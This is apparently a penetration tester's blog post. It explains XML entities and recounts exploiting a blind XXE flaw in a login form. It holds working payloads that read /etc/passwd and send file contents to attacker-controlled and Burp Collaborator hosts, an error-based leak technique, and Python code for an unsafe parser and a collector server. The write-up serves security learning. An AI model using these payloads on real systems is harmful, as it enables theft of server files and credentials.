Today I will talk about a severe vulnerability I found during a real pentesting exercise. More precisely, I was able to exploit XXE in order to “blindly” exfiltrate system files from a server using SSRF and an error-based technique.
XML stands for “Extensible Markup Language” and is a language designed for storing and transferring data. It is similar to HTML in that it uses a tag-based syntax and a tree structure. However, XML has no predefined tags: each tag can be named according to the data it contains.
XML Document Type Definition
The structure and data types of an XML document are defined in the Document Type Definition (DTD), which is introduced by the optional DOCTYPE declaration at the start of the document.
What is interesting about the DTD declaration is that it can be fully contained in the document (internal DTD), loaded from an external resource (external DTD) or a mix of both.
An XML element is everything placed within the start tag and the end tag (both included).
<user> <name>Peter</name> <age>23</age> </user>
These elements can be declared within the DTD:
<!DOCTYPE user [ <!ELEMENT user (name,age,email,address)> <!ELEMENT name (#PCDATA)> <!ELEMENT age (#PCDATA)> <!ELEMENT email (#PCDATA)> <!ELEMENT address (#PCDATA)> ]>
Here, <!DOCTYPE user states that the root element of the document is user. <!ELEMENT user (name,age,email,address)> declares that the user element must contain the elements name, age, email and address, in that order, each of which holds #PCDATA (parsed character data).
XML Custom Entities
XML entities are a way of referencing data in the document instead of using the data itself. They can be thought of as variables within the XML document.
Some of these entities are built into the XML specification, like &lt; and &gt;, which represent the < and > symbols.
However, we can define our own custom entities within the DTD:
<!DOCTYPE foo [ <!ENTITY test "This is a test message" > ]> <name> Peter </name> <message> &test; </message>
As you can see, we are defining a custom entity called test which can be referenced from the document body. The result is the following:
<name> Peter </name> <message> This is a test message </message>
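The expansion can be reproduced with Python's standard library. This is only a minimal sketch: the <foo> wrapper element and the expand_entities helper are additions of mine so that the snippet is a well-formed, self-contained document.

```python
import xml.etree.ElementTree as ET

# The document from the text, wrapped in a single root element.
# The <foo> wrapper is an assumption added to make the document well-formed.
DOCUMENT = """<!DOCTYPE foo [ <!ENTITY test "This is a test message" > ]>
<foo>
  <name> Peter </name>
  <message> &test; </message>
</foo>"""


def expand_entities(xml_text: str) -> str:
    """Parse the document and return the text of <message> after expansion."""
    root = ET.fromstring(xml_text)
    return root.findtext("message").strip()


if __name__ == "__main__":
    print(expand_entities(DOCUMENT))
```

The parser replaces &test; while building the tree, so application code never sees the reference itself, only the substituted text.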
XML External Entities (XXE)
There is a special type of XML entity called an external entity, which references data located outside the DTD and the document itself. External entities are defined with the SYSTEM keyword and must include a URL:
<!DOCTYPE foo [ <!ENTITY external SYSTEM "http://my-website.com/" > ]>
The URL can use the file:// protocol, which means it will load a local file.
XXE Basic Exfiltration
This functionality can be exploited if the parser is not configured properly. Imagine a website which allows us to change our user data by sending the following XML document:
<!DOCTYPE user> <name> Peter </name> <email> firstname.lastname@example.org </email> <age> 23 </age>
An attacker could intercept the request using a proxy and change its content:
<!DOCTYPE user [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]> <name> Peter </name> <email> &xxe; </email> <age> 23 </age>
As you can imagine, the parser will load the content of /etc/passwd into the xxe external entity, so when we visit the user profile in the webpage, instead of the email we will see the exfiltrated file.
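To make the mechanism concrete, here is a sketch of a parser that has been deliberately configured to resolve external entities, using Python's xml.parsers.expat. It is not the parser of the target application: the function names, the <user> wrapper element and the idea of pointing the entity at a temporary file instead of /etc/passwd are all assumptions made for the demonstration.

```python
import pathlib
import tempfile
import urllib.request
import xml.parsers.expat as expat


def parse_resolving_external_entities(xml_text: str) -> str:
    """Return all character data, fetching every SYSTEM entity that is referenced.

    This mimics an unsafe configuration on purpose; untrusted input should
    never be parsed this way.
    """
    chunks = []
    parser = expat.ParserCreate()

    def on_external_entity(context, base, system_id, public_id):
        # Fetch whatever the SYSTEM identifier points to (file://, http://, ...).
        with urllib.request.urlopen(system_id) as response:
            content = response.read()
        # Parse the fetched content in place of the entity reference.
        # The child parser inherits the handlers of the parent.
        child = parser.ExternalEntityParserCreate(context)
        child.Parse(content, True)
        return 1  # a non-zero value tells expat the entity was handled

    parser.ExternalEntityRefHandler = on_external_entity
    parser.CharacterDataHandler = chunks.append
    parser.Parse(xml_text, True)
    return "".join(chunks)


def build_payload(target_uri: str) -> str:
    """Build a request like the tampered one above, pointing at target_uri."""
    return (
        f'<!DOCTYPE user [ <!ENTITY xxe SYSTEM "{target_uri}" > ]>'
        "<user><name>Peter</name><email>&xxe;</email><age>23</age></user>"
    )


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as directory:
        # Stand-in for a sensitive file such as /etc/passwd.
        secret = pathlib.Path(directory) / "secret.txt"
        secret.write_text("root:x:0:0:root:/root:/bin/bash\n")
        print(parse_resolving_external_entities(build_payload(secret.as_uri())))
```

Once the entity has been resolved, the file content is ordinary character data inside <email>, which is why it ends up wherever the application later displays that field.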
XML Parameter Entities
A parameter entity is a special kind of XML entity that can only be referenced within the DTD. When a parameter entity is declared, the % symbol must precede the entity name:
<!DOCTYPE foo [ <!ENTITY % parameterentity "This is a parameter entity declaration"> %parameterentity; ]>
This can be used, for example, to import DTD entities from an external resource:
<!DOCTYPE foo [ <!ENTITY % newentity SYSTEM "http://my-website.com/new_entity.dtd"> %newentity; ]>
If the content of new_entity.dtd is:
<!ENTITY test "This is an imported test entity!">
The %newentity; parameter entity reference will be replaced by its content, and the DTD will effectively look like this:
<!DOCTYPE foo [ <!ENTITY % newentity SYSTEM "http://my-website.com/new_entity.dtd"> <!ENTITY test "This is an imported test entity!"> ]>
So the entity &test; can be referenced from the XML document.
My story: XXE exfiltration
Recently, during a pentesting exercise, I found a website with a login panel which sent the login data using an XML document:
This is quite uncommon, so the first thing that came to my mind was to test some XXE payloads. The problem was that the server only returned whether or not the credentials were valid. Although I could insert an external entity referencing a local file such as /etc/passwd, I could not read its content, because the server never echoed back the id_user or ds_password elements.
Blind SSRF Out-Of-Band Exfiltration
My first idea was to exfiltrate the file content using SSRF. If we can insert an entity referencing an external host under our control, we can use parameter entities to exfiltrate data within GET parameters. Let’s see how.
First of all, I checked whether XXE was working at all by forcing an SSRF request. For this PoC I used Burp Suite’s Collaborator.
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [<!ENTITY file SYSTEM "http://ynpi60potmi91th8urquqriqihobc0.burpcollaborator.net">]> <request> <login type="group"> <row> <id_user>&file;</id_user> <ds_password><![CDATA[YWRtaW4=]]></ds_password> <version><![CDATA]></version> </row> </login> </request>
The Collaborator client received a GET request from the IP of the website, so at this point I knew I was on the right path.
The next step was to load a file as a parameter entity and include it in the URL as a GET parameter:
<!DOCTYPE test [ <!ENTITY % data SYSTEM "file:///etc/hostname"><!ENTITY % xxe SYSTEM "http://hm72m0c6ajo29zoi8alrpb43vu1lpa.burpcollaborator.net?data=%data;"> %xxe; ]>
However, this does not work: inside the URL, %data; is not expanded and is treated as a literal string.
My second attempt was to nest one entity declaration inside another:
<!ENTITY % data SYSTEM "file:///etc/hostname"> <!ENTITY % eval "<!ENTITY % xxe SYSTEM 'http://hm72m0c6ajo29zoi8alrpb43vu1lpa.burpcollaborator.net?data=%data;'>"> %eval; %xxe;
This results in the following error:
<message>The parameter entity reference "%data;" cannot occur within markup in the internal subset of the DTD.</message>
So I tried to load the xxe parameter entity from an external resource:
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ENTITY % data SYSTEM "file:///etc/hostname"> <!ENTITY % eval SYSTEM "http://<my-ip>:8080/entity.xml"> %eval; ]> <request> <login type="group"> <row> <id_user>&xxe;</id_user> <ds_password><![CDATA[YWRtaW4=]]></ds_password> <version><![CDATA]></version> </row> </login> </request>
The file served at my-ip:8080/entity.xml contained:
<!ENTITY % all "<!ENTITY xxe SYSTEM 'http://s92csubifg43nn32glcocl4k4baayz.burpcollaborator.net?collect=%data;'>"> %all;
This did not raise the previous exception and worked as expected. Our Collaborator client received the following request:
As you can see, the collect parameter contained the web server hostname, so the exfiltration worked perfectly!
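For readers without Collaborator, the attacker-side host can be approximated with a few lines of Python. This is a sketch under assumptions, not the setup I used: the collector URL, the handler class and the helper names are hypothetical, and here a single server both serves entity.xml and records the collect parameter.

```python
import http.server
import urllib.parse

# Hypothetical placeholder for the host that receives the exfiltrated data.
COLLECTOR = "http://collector.example/"
captured = []  # values of the "collect" query parameter seen so far


def build_external_dtd(collector_url: str) -> bytes:
    """Return a DTD like entity.xml above, pointing at collector_url."""
    return (
        "<!ENTITY % all \"<!ENTITY xxe SYSTEM '"
        + collector_url
        + "?collect=%data;'>\"> %all;"
    ).encode("ascii")


def extract_collected(request_path: str) -> list:
    """Return the values of the collect parameter in a request path."""
    query = urllib.parse.urlparse(request_path).query
    return urllib.parse.parse_qs(query).get("collect", [])


class ExfilHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        if urllib.parse.urlparse(self.path).path == "/entity.xml":
            body = build_external_dtd(COLLECTOR)  # first request: serve the DTD
        else:
            captured.extend(extract_collected(self.path))  # second: record data
            body = b""
        self.send_response(200)
        self.send_header("Content-Type", "application/xml")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


if __name__ == "__main__":
    # Port 8080 matches the payload above; the bind address is an assumption.
    http.server.HTTPServer(("0.0.0.0", 8080), ExfilHandler).serve_forever()
```

The vulnerable parser makes two requests: one to fetch the external DTD, and a second one, triggered by &xxe;, that carries the file content in the query string.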
The problem was that larger files contained characters that are not valid in a URL, and the parser does not URL-encode them before making the request. Using PHP to encode the content would have been an option, but it did not work here.
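As an illustration of the encoding problem, this is what one line of /etc/passwd would have to look like to travel safely in a query string. The to_query_value helper is hypothetical and only shows the percent-encoding the parser does not perform for us.

```python
from urllib.parse import quote


def to_query_value(file_content: str) -> str:
    """Percent-encode file content so it could be used as a GET parameter value."""
    return quote(file_content, safe="")


if __name__ == "__main__":
    print(to_query_value("root:x:0:0:root:/root:/bin/bash\n"))
```

Colons, slashes and the trailing newline all need encoding, and a real /etc/passwd has many such lines.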
At this point I realized that each time I sent a malformed XML document, the server returned a stack trace with the error. If I tried to read a nonexistent file, the server would raise an exception and return a message similar to “The file /nonexistent/file.txt does not exist”.
What if, instead of a real file name, I made the server open a path built from the content of a file?
So I tried the following payload:
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ENTITY % data SYSTEM "file:///etc/passwd"> <!ENTITY % xxe SYSTEM "http://<my-ip>:8080/error.xml"> %xxe; ]> <request> <login type="group"> <row> <id_user> &error; </id_user> <ds_password><![CDATA[YWRtaW4=]]></ds_password> <version><![CDATA]></version> </row> </login> </request>
Where the file error.xml was:
<!ENTITY % eval "<!ENTITY error SYSTEM 'file:///nonexistent/%data;'>"> %eval;
And voilà! The server raised an exception where we could read the content of /etc/passwd!
The server tried to read the file /nonexistent/root:x:0:0:root… which obviously didn’t exist, so it raised an exception where we could see the whole filename, which actually is the content of /etc/passwd.
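The same effect is easy to reproduce outside XML. The following Python analogy is not what the server ran; error_message_for is a hypothetical helper that shows how a "file not found" error repeats whatever was placed in the path.

```python
def error_message_for(file_content: str) -> str:
    """Try to open /nonexistent/<file_content> and return the error text."""
    bogus_path = "/nonexistent/" + file_content
    try:
        with open(bogus_path):
            pass
    except OSError as exc:
        # The exception text includes the full path, and so the file content.
        return str(exc)
    return ""


if __name__ == "__main__":
    print(error_message_for("root:x:0:0:root:/root:/bin/bash"))
```

Any application that returns such error messages to the client turns a blind XXE into a readable one.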
Honestly, when I started working as a pentester a couple of months ago I didn’t expect to find CTF-like situations like this one. An attacker could exfiltrate the content of files like the ones stored at /home/<user>/.ssh/ and even gain SSH access to the server, which is critical!
I hope you found this article as interesting as I did. See ya!